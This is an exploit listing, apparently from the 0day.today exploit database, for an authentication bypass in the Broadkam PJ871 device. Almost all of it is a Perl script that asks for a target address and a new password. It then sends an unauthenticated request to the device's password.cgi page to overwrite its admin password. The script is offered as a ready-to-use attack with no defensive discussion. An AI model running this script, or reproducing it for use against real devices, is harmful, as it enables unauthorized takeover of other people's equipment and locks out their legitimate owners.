[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Broadkam PJ871 Authentication Bypass Vulnerability

Author
d3c0der
Risk
[
Security Risk High
]
0day-ID
0day-ID-21037
Category
web applications
Date add
27-07-2013
Platform
hardware
#!/usr/bin/perl
#d3c0der
 
 
use HTTP::Request;
use LWP::UserAgent;
 
  
 
print "= Target : ";
$ip=<STDIN>;
chomp $ip;
print "= new password : ";
$npass=<STDIN>;
chomp $npass;
 
if ( $ip !~ /^http:/ ) {
$ip = 'http://' . $ip;
}
if ( $ip !~ /\/$/ ) {
$ip = $ip . '/';
}
print "\n";
 
print "->attacking , plz wait ! : $ip\n";
  
 
  
 
@path1=("password.cgi?sysPassword=$npass");
 
foreach $ways(@path1){
 
$final=$ip.$ways;
 
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
 
  
}
  
print "[-] password changed to $npass \n";

#  0day.today [2024-12-24]  #